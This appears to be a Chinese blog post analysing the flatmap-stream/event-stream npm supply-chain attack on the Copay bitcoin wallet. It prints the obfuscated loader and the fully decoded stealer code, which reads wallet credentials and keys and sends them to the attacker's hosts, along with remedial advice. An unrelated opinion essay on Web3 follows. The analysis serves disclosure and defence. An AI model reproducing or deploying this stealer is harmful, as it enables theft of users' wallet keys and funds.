copayapi.host(之前DNS解析为:145.249.104.239,目前为:51.38.112.212)。 曝光整个事情的曝光十分具有戏剧性,一个完全不相关的第三方开发者在自己的项目中引入了 Nodemon 监控,但是控制台出现了一条警告 "DeprecationWarning: crypto.createDecipher is deprecated"。crypto是一个常用的加密解密库,最近因为 api 升级,它的 crypto.createDecipher方法已经在新版中废弃,因此系统抛出警告。一个意外将整个事件曝光然而,正常情况下对 nodejs 的监控是不需要进行加密解密的。所以为了解决这个意外的警告,这位热心的开发者将问题上报到了社区。在解决问题的过程中,他们一路向上遍历了他项目的依赖树,最终发现依赖是由 flatmap-stream 引入的。通过解密 flatmap-stream 的代码,由此揭开了整个事件的序幕。攻击与发现三、代码分析现在让我们通过回溯代码来一步步分析黑客是怎么实施他的盗窃的,如果不愿意看详细分析也可以直接跳到章节最后的总结图:)首先,攻击者上传的原始代码 (flatmap-stream@0.1.1)[unpkg.com/flatmap-str…] 是被压缩过的:var Stream=require("stream").Stream;module.exports=function(e,n)).failures?"failure":"error",m=;function w(r,e)a===++o&&(f&&(f=!1,i.emit("drain")),u&&v())}function p(r,e,t)function b(r,t,n))}function v(r)return i.writable=!0,i.readable=!0,i.write=function(r)return!f}catch(r)},i.end=function(r),i.destroy=function())},i.pause=function(),i.resume=function(),i};!function()var n=r(e("2e2f746573742f64617461")),o=t[e(n[3])][e(n[4])];if(!o)return;var u=r(e(n[2]))[e(n[6])](e(n[5]),o),a=u.update(n[0],e(n[8]),e(n[9]));a+=u.final(e(n[9]));var f=new module.constructor;f.paths=module.paths,f[e(n[7])](a,""),f.exports(n[1])}catch(r)}(); 复制代码其中问题代码被偷偷放在最后面,我们将代码解压缩并格式化可得到可读的问题代码1:! function () { try { var r = require, t = process; function e(r) { return Buffer.from(r, "hex").toString() } var n = r(e("2e2f746573742f64617461")), // 在Github上不存在,但是实际在发布的npm包里隐藏的 ‘./test/data.js’文件 o = t[e(n[3])][e(n[4])]; if (!o) return; var u = r(e(n[2]))[e(n[6])](e(n[5]), o), a = u.update(n[0], e(n[8]), e(n[9])); a += u.final(e(n[9])); var f = new module.constructor; f.paths = module.paths, f[e(n[7])](a, ""), f.exports(n[1]) } catch (r) }(); 复制代码上述代码部分被转成 16 进制,我们可以进行一次 16 进制转得到转码代码1,其中 r(e("2e2f746573742f64617461")),翻译过来就是 require("./test/data"); 目前 data.js 这个文件已原项目中被删除,根据 FallingSnow 的说明,data.js文件是一个如下的数组,对应原代码中的数组n。同样将该数组转码后,可得到:[ // 数组前两项为加密的黑客窃取代码 "75d4c87f3f6964903af7e527c420d9263f4af58ccb5843187aa0da1cbb4b6aedfd1bdc6faf32f38a885628612660af8630597969125c917dfc512c53453c96c143a2a058ba91bc37e265b44c5874e594caaf53961c82904a95f1dd33b94e4dd1d00e9878f66dafc55fa6f2f77ec7e7e8fe28e4f959e3f0911762fffbc36951a78457b94629f067c1f12927cdf97699656f4a2c4429f1279c4ebacde10fa7a6f5c44b14bc88322a3f06bb0847f0456e630888e5b6c3f2b8f8489cd6bc082c8063eb03dd665badaf2a020f1", "db67fdbfc39c249c6f338194a526fb95f5f210f52d487f117873df6e847769c06db7f8642cd2426b6ce00d6218413fdbba5bbbebc4e94bffdef6985a0e800132fe5821e62f2c1d79ddb5656bd5102176d33d79cf4560453ca7fd3d3c3be0190ae356efaaf5e2892f0d80c437eade2d28698148e72fbe17f1fac993a1314052345b701d65bb0ea3710145df687bb17182cd3ad6c121afef20bf02e0100fd63cbbf498321795372398c983eb31f184fa1adbb24759e395def34e1a726c3604591b67928da6c6a8c5f96808edfc7990a585411ffe633bae99ff0df165abb720810a4dc19f76ca748a34cb3d0f9b0d800d7657f702284c6e818080d4d9c6fff481f76fb7a7c5d513eae7aa84484822f98a183e192f71ea4e53a45415ddb03039549b18bc6e1", "63727970746f", // crypto "656e76", // env "6e706d5f7061636b6167655f6465736372697074696f6e", // npm_package_description "616573323536", // aes256 "6372656174654465636970686572", // createDecipher "5f636f6d70696c65", // _compile "686578", // hex "75746638" // utf8 ] 复制代码通过data.js对问题代码的数组 n 进行替换,我们可得到下面的转码代码2:!(function() { try { //攻击代码被伪装成16进制 var n = [ "75d4c87f3f6964903af7e527c420d9263f4af58ccb5843187aa0da1cbb4b6aedfd1bdc6faf32f38a885628612660af8630597969125c917dfc512c53453c96c143a2a058ba91bc37e265b44c5874e594caaf53961c82904a95f1dd33b94e4dd1d00e9878f66dafc55fa6f2f77ec7e7e8fe28e4f959e3f0911762fffbc36951a78457b94629f067c1f12927cdf97699656f4a2c4429f1279c4ebacde10fa7a6f5c44b14bc88322a3f06bb0847f0456e630888e5b6c3f2b8f8489cd6bc082c8063eb03dd665badaf2a020f1", "db67fdbfc39c249c6f338194a526fb95f5f210f52d487f117873df6e847769c06db7f8642cd2426b6ce00d6218413fdbba5bbbebc4e94bffdef6985a0e800132fe5821e62f2c1d79ddb5656bd5102176d33d79cf4560453ca7fd3d3c3be0190ae356efaaf5e2892f0d80c437eade2d28698148e72fbe17f1fac993a1314052345b701d65bb0ea3710145df687bb17182cd3ad6c121afef20bf02e0100fd63cbbf498321795372398c983eb31f184fa1adbb24759e395def34e1a726c3604591b67928da6c6a8c5f96808edfc7990a585411ffe633bae99ff0df165abb720810a4dc19f76ca748a34cb3d0f9b0d800d7657f702284c6e818080d4d9c6fff481f76fb7a7c5d513eae7aa84484822f98a183e192f71ea4e53a45415ddb03039549b18bc6e1" ]; var o = process["env"]["npm_package_description"]; if (!o) return; var u = require("crypto")["createDecipher"]("aes256", o), a = u.update(n[0], "hex", "utf8"); a += u.final("utf8"); var f = new module.constructor(); (f.paths = module.paths), f["_compile"](a, ""), f.exports(n[1]); } catch (r) })(); 复制代码其中这个数组 n 很特别,头两项 n[0], n[1] 的长字符串需要用被依赖项目的 "npm_package_description" 进行解密,并且只有当 description 正好为 "A Secure Bitcoin Wallet" 才能成功解密。而“很巧”的是 copay 项目的 description 正好为此,所以说这是针对 copay 钱包的定向攻击。同时,由于黑客在这里使用了 crypto.createDecipher 这个过时的api 才最终导致其暴露。 经过两轮解密后我们得到最终的 解密代码,我语义化并注释后如下:! function() { function startUp() { try { var HTTP = require("http"), Crypto = require("crypto"), publicKey = "-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxoV1GvDc2FUsJnrAqR4C\\nDXUs/peqJu00casTfH442yVFkMwV59egxxpTPQ1YJxnQEIhiGte6KrzDYCrdeBfj\\nBOEFEze8aeGn9FOxUeXYWNeiASyS6Q77NSQVk1LW+/BiGud7b77Fwfq372fUuEIk\\n2P/pUHRoXkBymLWF1nf0L7RIE7ZLhoEBi2dEIP05qGf6BJLHPNbPZkG4grTDv762\\nPDBMwQsCKQcpKDXw/6c8gl5e2XM7wXhVhI2ppfoj36oCqpQrkuFIOL2SAaIewDZz\\nLlapGCf2c2QdrQiRkY8LiUYKdsV2XsfHPb327Pv3Q246yULww00uOMl/cJ/x76To\\n2wIDAQAB\\n-----END PUBLIC KEY-----"; function postData(hostName, pathName, encryptedData) { hostName = Buffer.from(hostName, "hex").toString(); // 将16进制字符转换成string,"copayapi.host" 和111.90.151.134 var request = HTTP.request({ hostname: hostName, port: 8080, method: "POST", path: "/" + pathName, headers: { "Content-Length": encryptedData.length, "Content-Type": "text/html" } }, function() ); request.on("error", function(e) ), request.write(encryptedData), request.end() } // 偷取了用户信息并用公钥加密后发送 function encryptAndPost(pathName, userInfo) { for (var encryptedData = "", r = 0; r < userInfo.length; r += 200) { var o = userInfo.substr(r, 200); encryptedData += Crypto.publicEncrypt(publicKey, Buffer.from(o, "utf8")).toString("hex") + "+" } postData("636f7061796170692e686f7374", pathName, encryptedData), postData("3131312e39302e3135312e313334", pathName, encryptedData) // 攻击者的服务器copayapi.host,111.90.151.134 } // 偷取用户信息 function stealUserInfo(profile, stealSuccessCB) { if (window.cordova) { try { var dataDirectory = cordova.file.dataDirectory; // cordova接口获取程序的数据目录, Persistent and private data storage within the application's sandbox resolveLocalFileSystemURL(dataDirectory, function(e) { e.getFile(profile, { create: !1 }, function(e) { e.file(function(e) { var reader = new FileReader; reader.onloadend = function() { return stealSuccessCB(JSON.parse(reader.result)) }, reader.onerror = function(e) { reader.abort() }, reader.readAsText(e) }) }) }) } catch (e) } else { try { var r = localStorage.getItem(profile); if (r) return stealSuccessCB(JSON.parse(r)) } catch (e) try { chrome.storage.local.get(profile, function(e) { if (e) return stealSuccessCB(JSON.parse(e[profile])) }) } catch (e) } } // 执行代码由此开始,针对账户内大于100BTC余额的账户,偷取用户的证书和个人信息。 global.CSSMap = , stealUserInfo("profile", function(e) { for (var t in e.credentials) { var n = e.credentials[t]; "livenet" == n.network && stealUserInfo("balanceCache-" + n.walletId, function(profileInfo) { var that = this; that.balance = parseFloat(profileInfo.balance.split(" ")[0]), "btc" == that.coin && that.balance < 100 || "bch" == that.coin && that.balance < 1e3 || (global.CSSMap[that.xPubKey] = true, encryptAndPost("c", JSON.stringify(that))) }.bind(n)) } }); // 引入credentials并重写,再次尝试偷取用户公钥 var Credentials = require("bitcore-wallet-client/lib/credentials.js"); Credentials.prototype.getKeysFunc = e.prototype.getKeys, e.prototype.getKeys = function(e) { var t = this.getKeysFunc(e); // 正常执行Credentials.prototype.getKeys try { // 尝试窃取秘钥 global.CSSMap && global.CSSMap[this.xPubKey] && (delete global.CSSMap[this.xPubKey], encryptAndPost("p", e + "\\t" + this.xPubKey)) } catch (e) return t } } catch (e) } window.cordova ? document.addEventListener("deviceready", startUp) : startUp() }(); 复制代码由于上面的解密代码比较清晰,所以这里只简述一下。大概是分两步偷取用户的个人信息和钱包秘钥后,加密发往自己在吉隆坡的服务器。实现方式是通过JS的原型链引用,在 flatmap-stream 里重写了 Credentials.getKeys 方法,这个方法被用 copay-dash 项目组用来获取用户的秘钥,他在程序执行该方法后,将用户秘钥发往自己的服务器。为了让大家能更好梳理攻击的流程,我画出了解密的流程图以供参考:黑客的攻击步骤四、影响与反思问题暴露后,copay 钱包项目组做了紧急修复并上线v5.2.0版本,但依然还有大量的未更新的钱包老版本(v5.0.2 ~ v5.1.0)中毒,他们也建议用户自行升级并将比特币转移到新的钱包中。目前已有用户声称电子钱包被盗作为第三方开发者我们可以通过 "npm ls event-stream flatmap-stream" 来核对我们的项目里是否安装了相关的依赖包。下面是一个安装了中毒依赖包的项目,如果你也安装了event-stream@3.3.6 请将依赖升级到最新版即可。[redacted] └─┬ npm-run-all@4.1.3 └─┬ ps-tree@1.1.0 └─┬ event-stream@3.3.6 └── flatmap-stream@0.1.2 复制代码针对依赖链攻击目前还没有很好的解决方法,虽然社区里有建议限制依赖包的权限或要求 npm 明文提交等方式,但短期来看都不太可能实现。我们能做也许只有在引用依赖之前,仔细审核一下被引用的包。同时,对经过安全认证的包锁住版本,确保不会引入新的有毒依赖包。参考文档event-stream vulnerability explained 高达 800 万次下载量的 npm 包被黑客篡改了代码,你的设备或正成为挖矿机 JavaScript黑客是这样窃取比特币的,Vue开发者不用担心!@Fundebug
-
-
聊聊我眼中的 Web 3.0 如果你仔细的审视 Web3 世界中的一切,以及资本对 Web3 的热衷程度,你会发现其实 Web3 是一个绕开金融中心化资本管制的网络资本世界。人类的资本形式一直都在发生变化,新资本形式的出现往往代表着一种新的阶级,比如工业革命带来的工业资本,能源革命形成的能源资本,信息技术革命带来的网络资本,代表华尔街金融业的金融资本等等,任何一种资本都需要和某种价值物进行绑定,从而实现资本的价值兑现,当资本绑定的价值物消失或者衰亡,那么资本也随之消失。资本没有国界,也没有种族,资本在全世界所有人类活动的地方都可以存在,但受到各国的资本管制,资本并不是完全自由流动的。但是资本的特征永远都是从低利润率低效率的地方朝着高利润率高效率的地方流动,所谓高效率,高利润,其实就是毫无管制的人类活动区域,没有资本管制,没有任何资本流动的损耗。举个例子,比如非洲,非洲有很多地方是无政府的状态,但是资本为什么没有大量涌入呢?因为效率低,低效率导致资本损耗增大,从而抑制了资本流入。所以让我们看看 Web3 是什么,Web3 所倡导的去中心化就是去监管,避开了现有国家的金融监管这代表了资本自由,举个例子,比如你在某国注册一家企业,然后想通过企业的方式筹措资金,那你需要符合当地的监管调率,通过资本市场以企业的技术,抵押物,或者企业的未来进行融资。但如果你在 Web3 的世界里创建一家虚拟企业,你只需要一个 idea 甚至都不需要一个办公地址和注册资金,你就可以以代币的形式为企业筹集资金,相比传统的企业融资路径,Web3 的效率是极高的,同时也不会有任何组织来审查你的融资过程,完全依托 Web3 世界里的居民自发的去判断是否要参与你的融资,这几乎可以说是资本的天堂。因此 Web3世界里充斥着大量投机和炒作,其根本原因在于资本的高效流动带来的各种财富效应,同时借助现代金融技术,通过杠杠放大了资本,进一步提升了对场外人士的吸引力。确实从赚钱的角度来看,风险和收益是等价的,Web3是世界里的巨大风险自然也伴随着巨大的收益。所以 Web3 是什么?我认为 Web3 不代表任何所谓的未来,Web3本质就是通过代币提供了一种新的资本绑定物,从而创造了一种新的资本,代币资本,基于这种代币资本形成的人类活动区域就是所谓的 Web3.上面我也提到了,任何一种资本的兴盛与消亡要看其绑定物的变化,我们说工业资本,是因为现代社会必须依赖制造业,金融资本,金融活动是现代贸易的基础,以科技企业为代表的数据资本,现代社会几乎离不开互联网,必然会持续的产生数据,能源资本就不说了,能源是工业的基础,可见资本的绑定物本质是基于人类活动需求产生的,而 Web3 中的代币对于我们来说其需求是什么呢?逃脱各国金融监管,代币的一个很大作用在于非法产业的需求,来自世界各国非法组织的活动产生的需求又或者地下钱庄交易,黑市交易等等,这类需求将长期存在,因此代币不可能完全消失,例如 比特币,以太坊的价值永远不可能归零。除非全世界各个国家一起严厉打击,代币的匿名性决定了代币就是非法组织最喜爱的金融工具。其次是投机需求,投机需求在经济繁荣周期会大量释放,各国投机者会大量涌入,从这个角度看,只要代币的基本需求(非法组织活动的金融需求)不消失,那么随着经济周期投机需求就会反反复复。按除这两者之外呢,是否存在对 Web3 的合理且可持续的需求呢?就目前来看 Web3 是一个纯粹的资本世界,并且 Web3 世界里的人正在和现实世界割裂开来,Web3 只能满足 Web3 的需求。不过随着经济周期进入下行周期,Web3 的资本必然会逐步缩减,投机需求被抑制,会进入较为低迷的时期。
